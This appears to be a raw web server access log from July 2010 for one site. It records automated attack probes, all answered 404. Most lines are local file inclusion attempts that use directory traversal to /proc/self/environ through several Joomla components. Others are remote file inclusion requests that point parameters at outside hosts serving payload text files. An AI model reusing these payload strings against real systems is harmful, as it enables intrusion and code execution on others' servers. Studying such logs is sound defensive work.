178.162.133.106 - - [31/Jul/2010:09:40:27 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:40:52 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:40:52 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
70.38.11.39 - - [31/Jul/2010:09:40:54 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
70.38.11.39 - - [31/Jul/2010:09:40:54 -0700] "GET /logs/access_100429.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
70.38.11.39 - - [31/Jul/2010:09:40:54 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
114.108.176.9 - - [31/Jul/2010:09:41:07 -0700] "GET /logs/access_100428.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
114.108.176.9 - - [31/Jul/2010:09:41:10 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:41:24 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:41:33 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:41:43 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:41:43 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:41:46 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:41:48 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:41:50 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
70.38.11.39 - - [31/Jul/2010:09:41:52 -0700] "GET /logs/access_100524.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:41:59 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:03 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:05 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:07 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:42:27 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:42:27 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:35 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:42:42 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:42 -0700] "GET /logs/access_100601.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:43 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:42:43 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:43 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:42:44 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:42:45 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:42:46 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:43:01 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:43:03 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:43:26 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:43:26 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:43:50 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:43:51 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:44:41 -0700] "GET /logs/access_100601.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:44:41 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:44:41 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:44:46 -0700] "GET /logs/access_100602.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:45:51 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:45:51 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:46:01 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
213.168.176.11 - - [31/Jul/2010:09:46:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
213.168.176.11 - - [31/Jul/2010:09:46:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:46:30 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:46:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:46:34 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:09:49:08 -0700] "GET /logs/access_100530.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:49:14 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:49:14 -0700] "GET /logs/access_100429.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:49:14 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:49:22 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:49:22 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:49:22 -0700] "GET /logs/access_100429.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:09:50:28 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:09:50:33 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:09:50:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
91.196.124.16 - - [31/Jul/2010:09:50:33 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
195.42.120.131 - - [31/Jul/2010:09:51:09 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
195.42.120.131 - - [31/Jul/2010:09:51:10 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
195.42.120.131 - - [31/Jul/2010:09:51:13 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:51:14 -0700] "GET /logs/access_100524.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.180.89.75 - - [31/Jul/2010:09:51:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:51:30 -0700] "GET /logs/access_100524.log%20%20//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:51:38 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.168.176.11 - - [31/Jul/2010:09:51:52 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
213.168.176.11 - - [31/Jul/2010:09:51:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:51:53 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.168.176.11 - - [31/Jul/2010:09:52:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
213.168.176.11 - - [31/Jul/2010:09:52:11 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:53:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:53:06 -0700] "GET /skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.147.62.92 - - [31/Jul/2010:09:53:06 -0700] "GET /logs/access_100429.log%20%20//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:54:57 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:54:57 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:54:58 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
195.42.120.131 - - [31/Jul/2010:09:55:07 -0700] "GET /logs/access_100429.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://un04.com/bbs/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:59:19 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:59:22 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:09:59:23 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:03:13 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:03:13 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:03:13 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:03:15 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:03:25 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:04:27 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:04:27 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:05:46 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:05:46 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:05:46 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:05:46 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:08:41 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:08:42 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:08:53 -0700] "GET /logs/access_100520.log%20%20//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:08:53 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:08:53 -0700] "GET /skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:08:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:08:56 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:08:58 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:09:00 -0700] "GET /skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:09:00 -0700] "GET /logs/access_100520.log%20%20//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:09:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.23.94 - - [31/Jul/2010:10:09:00 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:10:09:06 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:10:09:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:10:09:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:14:33 -0700] "GET /logs/access.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:14:36 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:14:36 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:14:41 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:15:12 -0700] "GET /logs/access.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:15:13 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:15:14 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:15:47 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:15:48 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:15:48 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
125.164.72.146 - - [31/Jul/2010:10:16:16 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:17:00 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:17:01 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:17:01 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:17:27 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
194.158.206.224 - - [31/Jul/2010:10:17:28 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.hellionindustries.com"
